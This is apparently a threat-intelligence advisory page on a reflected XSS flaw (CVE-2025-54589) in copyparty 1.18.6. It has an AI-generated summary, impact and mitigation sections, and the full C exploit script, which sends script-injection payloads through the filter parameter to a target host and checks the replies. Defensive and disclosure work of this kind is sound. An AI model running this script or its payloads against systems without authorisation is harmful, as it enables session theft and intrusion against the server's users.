Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
AI Analysis
Technical Summary
The security threat involves a reflected Cross-Site Scripting (XSS) vulnerability in Copyparty version 1.18.6, a web-based file-sharing server. Reflected XSS occurs when untrusted user input is immediately echoed by the web application without proper sanitization or encoding, allowing attackers to inject malicious JavaScript code. When a victim clicks a crafted URL or visits a manipulated page, the malicious script executes in their browser context, potentially stealing cookies, session tokens, or performing actions on behalf of the user. The exploit code for this vulnerability is publicly available and implemented in the C programming language, indicating that the vulnerability can be reliably triggered. Although no known exploits in the wild have been reported, the presence of exploit code increases the risk of future attacks. Copyparty’s web interface is the attack surface, and since it is often used for file sharing, attackers could leverage this vulnerability to compromise user sessions or spread malware. The lack of a patch link suggests that a fix may not yet be publicly available, emphasizing the need for immediate mitigation steps. The vulnerability’s medium severity rating reflects the typical impact of reflected XSS, which requires user interaction and generally does not allow direct system compromise but can lead to significant data exposure or user impersonation.
Potential Impact
For European organizations, the reflected XSS vulnerability in Copyparty 1.18.6 could lead to unauthorized access to user sessions, theft of sensitive information such as authentication tokens, and potential spread of malware through malicious scripts. Organizations using Copyparty for internal or external file sharing risk exposing their users to phishing or session hijacking attacks. This could result in data breaches, loss of user trust, and compliance violations under regulations like GDPR. Public-facing Copyparty instances are particularly at risk, as attackers can lure users into clicking malicious links. The impact on confidentiality and integrity is significant, though availability is less likely to be affected. The presence of exploit code increases the likelihood of targeted attacks, especially against organizations with lax input validation or insufficient web security controls.
Mitigation Recommendations
European organizations should immediately audit their Copyparty deployments to identify affected versions. Until an official patch is released, implement strict input validation and output encoding on all user-supplied data in the web interface to prevent script injection. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Educate users about the risks of clicking suspicious links related to file-sharing services. Monitor web server logs for unusual requests that may indicate exploitation attempts. Consider isolating or restricting access to Copyparty instances to trusted networks only. Stay informed about updates from Copyparty developers and apply patches promptly once available. Additionally, use web application firewalls (WAFs) configured to detect and block XSS payloads targeting Copyparty endpoints.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Poland, Italy
Indicators of Compromise
- exploit-code: /* * Author : Byte Reaper * CVE : CVE-2025-54589 * Title : Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) * CVE-2025-54589 is a reflected cross-site scripting (XSS) vulnerability in Copyparty (≤ 1.18.6) where the filter parameter is inserted into the HTML response without proper sanitization, allowing an attacker to inject and execute arbitrary JavaScript in a victim’s browser */ #include <curl/urlapi.h> #include <netinet/in.h> #include <stdio.h> #include <string.h> #include <curl/curl.h> #include "argparse.h" #include <stdlib.h> #include <arpa/inet.h> #include <stdarg.h> #include <unistd.h> #define FULL_URL 2500 #define COLOR_RESET "\e[0m" #define COLOR_RED "\e[1;31m" #define COLOR_GRN "\e[1;32m" #define COLOR_YEL "\e[1;33m" #define COLOR_BLU "\e[1;34m" #define COLOR_CYN "\e[1;36m" #define COLOR_WHT "\e[1;37m" #define COLOR_PUR "\e[1;35m" #define PRINT_OK(fmt, ...) print_color(COLOR_GRN, "" fmt, ##__VA_ARGS__) #define PRINT_ERR(fmt, ...) print_color(COLOR_RED, "" fmt, ##__VA_ARGS__) #define PRINT_WARN(fmt, ...) print_color(COLOR_YEL, "" fmt, ##__VA_ARGS__) #define PRINT_INFO(fmt, ...) print_color(COLOR_BLU, "" fmt, ##__VA_ARGS__) #define PRINT_NOTE(fmt, ...) print_color(COLOR_CYN, "" fmt, ##__VA_ARGS__) int verbose = 0; int useC = 0; const char *ipT = NULL; int portT = 0; const char *cookies = NULL; const char *caFile = NULL; int sCa = 0; int useColor = 1; int useHttp = 0; void print_color(const char *color, const char *fmt, ...) { va_list args; va_start(args, fmt); if (useColor) { printf("%s", color); } vprintf(fmt, args); if (useColor) { printf("%s", COLOR_RESET); } va_end(args); } void exitAssembly() { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $231, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { PRINT_ERR("[-] Failed to allocate memory!\n"); exitAssembly(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } const char *payloadXss[] = { "</script><script>alert(1)</script>", "<script\x09type=\"text/javascript\">javascript:alert(XSS);</script>", "<script\x0Ctype=\"text/javascript\">javascript:alert(byte);</script>" }; int number = sizeof(payloadXss) / sizeof(payloadXss[0]); const char *wordF[] = { "Error", "Exception", "Invalid", "XSS", "<script>", "</script>", "alert(1)", "syntax", "unexpected", "undefined", "NaN", "stack trace", "TypeError", "ReferenceError", "Warning", "Access denied", "eval(", "byte", }; int numberW = sizeof(wordF) / sizeof(wordF[0]); void auto_detect_color() { if (!isatty(fileno(stdout))) { useColor = 0; } } void senR(const char *ip, int port) { char full[FULL_URL]; CURLcode res ; CURL *curl = curl_easy_init(); struct Mem response ; response.buffer= NULL; response.len = 0; for (int h = 0; h < number ; h++) { if (!curl) { PRINT_ERR("[-] Error Create Object Curl !\n"); PRINT_ERR("[-] Check Your Connection\n"); exitAssembly(); } if (verbose) { PRINT_OK("==========================================\n"); PRINT_OK("[1;33m[+] Cleaning Response...\n"); PRINT_OK("[1;33m[+] Response Buffer : NULL\n"); PRINT_OK("[1;33m[+] Response Len : 0\n"); PRINT_OK("==========================================\n"); } if (curl) { char *payloadE = curl_easy_escape(curl, payloadXss[h], 0); struct curl_slist *headers = NULL; if (!payloadE) { PRINT_ERR("[-] Error Encode Payload !\e[0m\n"); curl_slist_free_all(headers); curl_easy_cleanup(curl); exitAssembly(); } const char *proto = useHttp ? "http" : "https"; int len1 = snprintf(full, sizeof(full), "%s://%s:%d/?filter=%s", proto, ip, port, payloadE); if (len1 >= sizeof(full)) { PRINT_ERR("[-] URL too long\n"); exitAssembly(); } PRINT_INFO("[+] Encode Payload : %s\n", payloadXss[h]); PRINT_INFO("[+] Encode Payload Successfully.\n"); PRINT_INFO("[+] Payload Encode : %s\n", payloadE); PRINT_INFO("[+] target IP : %s\n", ip); printf("[+] Full Url : %s\n", full); printf("[+] Port : %d\n", port); curl_easy_setopt(curl, CURLOPT_URL, full); curl_free(payloadE); if (useC) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); usleep(1500000); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); if (sCa) { curl_easy_setopt(curl, CURLOPT_CAINFO, caFile); } else { curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); } headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); char refR[120]; int lenF = snprintf(refR, sizeof(refR), "Referer: http://%s:%d", ip, port); if (lenF < 0 || (size_t)lenF >= sizeof(refR)) { PRINT_ERR("[-] Len Header Referer is Long ! \n"); response.buffer = NULL; response.len = 0; curl_slist_free_all(headers); curl_easy_cleanup(curl); exitAssembly(); } headers = curl_slist_append(headers, refR); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); if (verbose) { PRINT_OK("------------------------------------------[Verbose Curl]------------------------------------------\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } res = curl_easy_perform(curl); curl_slist_free_all(headers); if (res == CURLE_OK) { PRINT_OK("-----------------------------------------------------------------\n"); long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); PRINT_INFO("[+] Request sent successfully\e[0m\n"); PRINT_OK("[+] Http Code -> %ld\e[0m\n", httpCode); FILE *log = fopen("results.txt", "a"); if (log == NULL) { PRINT_ERR("[-] Error Create File !\n"); exitAssembly(); } if (log) { fprintf(log, "[+] Target: %s:%d | Payload: %s\n", ip, port, payloadXss[h]); fprintf(log, "[+] Response : \n%s\n", response.buffer); fclose(log); } if (httpCode >= 200 && httpCode < 300) { PRINT_OK("[+] Http Code (200 < 300) : %ld\n",httpCode); for (int s = 0; s < numberW ; s++) { if (strstr(response.buffer, wordF[s]) != NULL) { PRINT_INFO("[+] A suspicious word was found in the server's response !!\n"); PRINT_INFO("[+] Word Found : %s\n", wordF[s]); PRINT_NOTE("[+] The vulnerability CVE-2025-54589 exists on the server\n"); PRINT_OK("\n======================================== [Response Server] ========================================\n"); printf("%s\n", response.buffer); printf("[Len] : %zu\n", response.len); PRINT_OK("\n==================================================================================================\n"); } } } else { PRINT_ERR("[-] HTTP Code Not Range Positive (200 < 300) : %ld\n", httpCode); PRINT_ERR("[+] Try Next Payload : %s\e[0m\n", payloadXss[h]); } } else { PRINT_ERR("[-] Error Send Request\n"); PRINT_ERR("[-] Error : %s\e[0m\n", curl_easy_strerror(res)); exitAssembly(); } } } if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } curl_easy_cleanup(curl); } int main(int argc, const char **argv) { curl_global_init(CURL_GLOBAL_DEFAULT); printf( "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▖▖▄▖▄▖▄▖\n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▙▌▙▖▙▌▙▌\n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▄▌ ▌▄▌▙▌▄▌\n" "Byte Reaper\n" ); int noColor = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('i', "ip", &ipT, "Target IP "), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_INTEGER('p', "port", &portT, "Enter Target Port"), OPT_STRING('a', "ca" , &caFile, "Enter Name File CA\n"), OPT_BOOLEAN('t', "http", &useHttp, "HTTP Protocol"), OPT_BOOLEAN('n', "no-color", &noColor, "Disable colored output"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (ipT == NULL) { PRINT_ERR("[-] Please Enter Target Ip And Port !\n"); PRINT_ERR("[-] Ex : ./exploit -i <IP> -p <PORT>\n"); PRINT_ERR("[-] Exit Syscall\n"); curl_global_cleanup(); exitAssembly(); }; printf("---------------------------------------------------------------------\n\n"); printf("[+] Start Exploit XSS (CVE-2025-54589)...\n"); if (cookies) { useC = 1; } if (verbose) { verbose = 1; } if (!portT) { printf("[+] Default Port : %d\n", 3923); portT = 3923; } if (caFile) { sCa = 1; } if (useColor) { useColor = 1; } if (noColor) { useColor = 0; } if (useHttp) { useHttp = 1; } auto_detect_color(); senR(ipT, portT); curl_global_cleanup(); return 0; }
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
Description
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
AI-Powered Analysis
Technical Analysis
The security threat involves a reflected Cross-Site Scripting (XSS) vulnerability in Copyparty version 1.18.6, a web-based file-sharing server. Reflected XSS occurs when untrusted user input is immediately echoed by the web application without proper sanitization or encoding, allowing attackers to inject malicious JavaScript code. When a victim clicks a crafted URL or visits a manipulated page, the malicious script executes in their browser context, potentially stealing cookies, session tokens, or performing actions on behalf of the user. The exploit code for this vulnerability is publicly available and implemented in the C programming language, indicating that the vulnerability can be reliably triggered. Although no known exploits in the wild have been reported, the presence of exploit code increases the risk of future attacks. Copyparty’s web interface is the attack surface, and since it is often used for file sharing, attackers could leverage this vulnerability to compromise user sessions or spread malware. The lack of a patch link suggests that a fix may not yet be publicly available, emphasizing the need for immediate mitigation steps. The vulnerability’s medium severity rating reflects the typical impact of reflected XSS, which requires user interaction and generally does not allow direct system compromise but can lead to significant data exposure or user impersonation.
Potential Impact
For European organizations, the reflected XSS vulnerability in Copyparty 1.18.6 could lead to unauthorized access to user sessions, theft of sensitive information such as authentication tokens, and potential spread of malware through malicious scripts. Organizations using Copyparty for internal or external file sharing risk exposing their users to phishing or session hijacking attacks. This could result in data breaches, loss of user trust, and compliance violations under regulations like GDPR. Public-facing Copyparty instances are particularly at risk, as attackers can lure users into clicking malicious links. The impact on confidentiality and integrity is significant, though availability is less likely to be affected. The presence of exploit code increases the likelihood of targeted attacks, especially against organizations with lax input validation or insufficient web security controls.
Mitigation Recommendations
European organizations should immediately audit their Copyparty deployments to identify affected versions. Until an official patch is released, implement strict input validation and output encoding on all user-supplied data in the web interface to prevent script injection. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Educate users about the risks of clicking suspicious links related to file-sharing services. Monitor web server logs for unusual requests that may indicate exploitation attempts. Consider isolating or restricting access to Copyparty instances to trusted networks only. Stay informed about updates from Copyparty developers and apply patches promptly once available. Additionally, use web application firewalls (WAFs) configured to detect and block XSS payloads targeting Copyparty endpoints.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52390
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
/* * Author : Byte Reaper * CVE : CVE-2025-54589 * Title : Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) * CVE-2025-54589 is a reflected cross-site scripting (XSS) vulnerability in Copyparty (≤ 1.18.6) where the filter parameter is inserted into the HTML response without proper sanitization, allowing an attacker to inject and execute arbitrary JavaScript in a victim’s browser */ #include <curl/urlapi.h> #include <netinet/in.h> #include <stdio.h> #include <string.h... (12479 more characters)
Threat ID: 68900844ad5a09ad00dd9e01
Added to database: 8/4/2025, 1:09:24 AM
Last enriched: 10/27/2025, 1:41:04 AM
Last updated: 11/19/2025, 9:02:26 PM
Views: 73
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Hackers Actively Exploiting 7-Zip Symbolic Link–Based RCE Vulnerability (CVE-2025-11001)
HighCritical Railway Braking Systems Open to Tampering
CriticalTwo-Year-Old Ray AI Framework Flaw Exploited in Ongoing Campaign
MediumFortinet Discloses Second Exploited FortiWeb Zero-Day in a Week
LowFortinet warns of new FortiWeb zero-day exploited in attacks
CriticalActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.